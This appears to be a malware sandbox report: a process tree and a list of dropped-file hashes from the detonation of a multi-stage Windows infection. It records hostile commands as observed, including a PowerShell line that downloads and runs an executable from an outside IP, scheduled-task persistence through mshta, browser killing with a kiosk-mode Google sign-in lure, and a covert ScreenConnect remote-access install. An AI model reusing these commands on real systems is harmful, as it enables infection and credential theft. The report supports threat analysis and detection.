                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:3504
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3304 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:1620
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4516,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4480
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3612 /prefetch:8
                      6⤵
                        PID:6076
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4384 /prefetch:8
                        6⤵
                          PID:6008
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4840 /prefetch:8
                          6⤵
                            PID:5396
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3612,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4472 /prefetch:8
                            6⤵
                              PID:5472
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 956
                          4⤵
                          • Program crash
                          PID:4836
                      • C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:4792
                      • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5428
                        • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                          "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5492
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 968
                          4⤵
                          • Program crash
                          PID:5516
                      • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5296
                        • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                          "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5752
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 788
                          4⤵
                          • Program crash
                          PID:708
                      • C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5672
                      • C:\Users\Admin\AppData\Local\Temp\1089286001\64195aed60.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089286001\64195aed60.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:5288
                      • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:4392
                        • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                          "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:2984
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 800
                          4⤵
                          • Program crash
                          PID:5776
                      • C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2568
                      • C:\Users\Admin\AppData\Local\Temp\1089289001\cda781c13c.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089289001\cda781c13c.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5236
                      • C:\Users\Admin\AppData\Local\Temp\1089290001\74caf6e3ae.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089290001\74caf6e3ae.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:5456
                      • C:\Users\Admin\AppData\Local\Temp\1089291001\a18028f754.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089291001\a18028f754.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1460
                      • C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2452
                      • C:\Users\Admin\AppData\Local\Temp\1089293001\ff653c0cca.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089293001\ff653c0cca.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:2220
                      • C:\Users\Admin\AppData\Local\Temp\1089294001\80ceef0059.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089294001\80ceef0059.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3476
                      • C:\Users\Admin\AppData\Local\Temp\1089295001\e189d890b8.exe
                        "C:\Users\Admin\AppData\Local\Temp\1089295001\e189d890b8.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:4072
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM firefox.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:5700
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM chrome.exe /T
                          4⤵
                          • Kills process with taskkill
                          PID:3636
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM msedge.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:6040
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM opera.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:2388
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM brave.exe /T
                          4⤵
                          • Kills process with taskkill
                          PID:3316
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          4⤵
                            PID:2336
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                              5⤵
                              • Checks processor information in registry
                              • Modifies registry class
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              • Suspicious use of SetWindowsHookEx
                              PID:6020
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {efea9a10-8391-4760-a1a4-a58cbca241c9} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" gpu
                                6⤵
                                  PID:5104
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a5f0882-f710-451d-bc6f-a080a43a73ab} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" socket
                                  6⤵
                                    PID:6120
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 1612 -prefMapHandle 1432 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b052712d-5e87-4163-a8f9-77d3ee7511b8} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab
                                    6⤵
                                      PID:5392
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1188 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4088 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a3c56c5-de9e-4fc1-bc6b-1e71d0b5b651} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab
                                      6⤵
                                        PID:5720
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1c96284-f84a-43b5-b351-ac99adabb6d0} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" utility
                                        6⤵
                                        • Checks processor information in registry
                                        PID:5812
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -childID 3 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c3cb250-18f6-47dd-9fe9-e0fff375d9b4} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab
                                        6⤵
                                          PID:4888
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5468 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84fbfb07-ad8a-4618-bd30-331f1dac7599} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab
                                          6⤵
                                            PID:5212
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5736 -prefMapHandle 5732 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {416bb4fe-3fb9-477e-abe9-41bfdf764bbc} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab
                                            6⤵
                                              PID:3476
                                      • C:\Users\Admin\AppData\Local\Temp\1089296001\5846e91d4e.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1089296001\5846e91d4e.exe"
                                        3⤵
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2016
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn YotzzmaPqR9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta" /sc minute /mo 25 /ru "Admin" /f
                                          4⤵
                                            PID:5700
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn YotzzmaPqR9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta" /sc minute /mo 25 /ru "Admin" /f
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:5008
                                          • C:\Windows\SysWOW64\mshta.exe
                                            mshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta
                                            4⤵
                                            • Checks computer location settings
                                            • System Location Discovery: System Language Discovery
                                            PID:5240
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                              5⤵
                                              • Blocklisted process makes network request
                                              • Command and Scripting Interpreter: PowerShell
                                              • Downloads MZ/PE file
                                              • System Location Discovery: System Language Discovery
                                              PID:872
                                              • C:\Users\Admin\AppData\Local\TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE
                                                "C:\Users\Admin\AppData\Local\TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE"
                                                6⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:5504
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2908 -ip 2908
                                      1⤵
                                        PID:3868
                                      • C:\ProgramData\vbftwc\bxvt.exe
                                        C:\ProgramData\vbftwc\bxvt.exe start2
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1460
                                      • C:\Windows\system32\msiexec.exe
                                        C:\Windows\system32\msiexec.exe /V
                                        1⤵
                                        • Enumerates connected drives
                                        • Boot or Logon Autostart Execution: Authentication Package
                                        • Drops file in Program Files directory
                                        • Drops file in Windows directory
                                        • Modifies data under HKEY_USERS
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:4464
                                        • C:\Windows\syswow64\MsiExec.exe
                                          C:\Windows\syswow64\MsiExec.exe -Embedding E12D4C35BBE75AF0AA88A001AEC0250A C
                                          2⤵
                                          • Loads dropped DLL
                                          • Suspicious use of WriteProcessMemory
                                          PID:2496
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID6D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240637781 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                            3⤵
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            PID:5108
                                        • C:\Windows\system32\srtasks.exe
                                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                          2⤵
                                            PID:1580
                                          • C:\Windows\syswow64\MsiExec.exe
                                            C:\Windows\syswow64\MsiExec.exe -Embedding E305F73D09853E95DB883A58AFDA8990
                                            2⤵
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            PID:4448
                                          • C:\Windows\syswow64\MsiExec.exe
                                            C:\Windows\syswow64\MsiExec.exe -Embedding 9B85C9FBD0E04272DFD8B5CB460F5052 E Global\MSI0000
                                            2⤵
                                            • Loads dropped DLL
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            PID:4748
                                        • C:\Windows\system32\vssvc.exe
                                          C:\Windows\system32\vssvc.exe
                                          1⤵
                                          • Checks SCSI registry key(s)
                                          PID:224
                                        • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe
                                          "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=5538fd77-72b6-457c-b3e9-8a5db180eeec&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="
                                          1⤵
                                          • Sets service image path in registry
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in System32 directory
                                          • System Location Discovery: System Language Discovery
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3284
                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                            "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "7444894e-b638-4068-b3bb-57a8094f6dea" "User"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:1712
                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                            "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0ad4f51c-b9ea-40bd-bed1-d598ccc24a0a" "System"
                                            2⤵
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • Checks processor information in registry
                                            • Modifies data under HKEY_USERS
                                            PID:1064
                                        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                          C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:5992
                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                          1⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6000
                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                          C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:5148
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5208 -ip 5208
                                          1⤵
                                            PID:928
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5728 -ip 5728
                                            1⤵
                                              PID:5880
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5884 -ip 5884
                                              1⤵
                                                PID:2300
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6104 -ip 6104
                                                1⤵
                                                  PID:1044
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5428 -ip 5428
                                                  1⤵
                                                    PID:776
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5296 -ip 5296
                                                    1⤵
                                                      PID:5760
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1580 -ip 1580
                                                      1⤵
                                                        PID:6132
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3948 -ip 3948
                                                        1⤵
                                                          PID:5952
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4392 -ip 4392
                                                          1⤵
                                                            PID:1468
                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                            1⤵
                                                              PID:2620
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                              1⤵
                                                                PID:5524
                                                              • C:\ProgramData\vbftwc\bxvt.exe
                                                                C:\ProgramData\vbftwc\bxvt.exe start2
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:2232
                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:708
                                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:3108
                                                              • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                                C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1580
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4636 -ip 4636
                                                                1⤵
                                                                  PID:1208

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Config.Msi\e58149d.rbs

                                                                  Filesize

                                                                  214KB

                                                                  MD5

                                                                  7f1ea63f1f7ce32ff83ebc8e064eb576

                                                                  SHA1

                                                                  1551c8ba3b0261daef2b683ccaeb24d594e5a6c3

                                                                  SHA256

                                                                  6730de7104e7679278caf7292121fded498ebca71c199dde3a37387e9ea07ffe

                                                                  SHA512

                                                                  801748f7d4682007bbfc59987ca64b00dd2580b693fc1b21757098166e2d2593a7890a3b6a2dc223b1541a7d64be9bca8f135f32398c18a465957cafbb55740f

                                                                • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources

                                                                  Filesize

                                                                  48KB

                                                                  MD5

                                                                  d524e8e6fd04b097f0401b2b668db303

                                                                  SHA1

                                                                  9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

                                                                  SHA256

                                                                  07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

                                                                  SHA512

                                                                  e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                                                                • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources

                                                                  Filesize

                                                                  26KB

                                                                  MD5

                                                                  5cd580b22da0c33ec6730b10a6c74932

                                                                  SHA1

                                                                  0b6bded7936178d80841b289769c6ff0c8eead2d

                                                                  SHA256

                                                                  de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

                                                                  SHA512

                                                                  c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

                                                                • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll

                                                                  Filesize

                                                                  192KB

                                                                  MD5

                                                                  3724f06f3422f4e42b41e23acb39b152

                                                                  SHA1

                                                                  1220987627782d3c3397d4abf01ac3777999e01c

                                                                  SHA256

                                                                  ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f

                                                                  SHA512

                                                                  509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

                                                                • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll

                                                                  Filesize

                                                                  66KB

                                                                  MD5

                                                                  5db908c12d6e768081bced0e165e36f8

                                                                  SHA1

                                                                  f2d3160f15cfd0989091249a61132a369e44dea4

                                                                  SHA256

                                                                  fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

                                                                  SHA512

                                                                  8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

                                                                • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe

                                                                  Filesize

                                                                  93KB

                                                                  MD5

                                                                  75b21d04c69128a7230a0998086b61aa

                                                                  SHA1

                                                                  244bd68a722cfe41d1f515f5e40c3742be2b3d1d

                                                                  SHA256

                                                                  f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

                                                                  SHA512

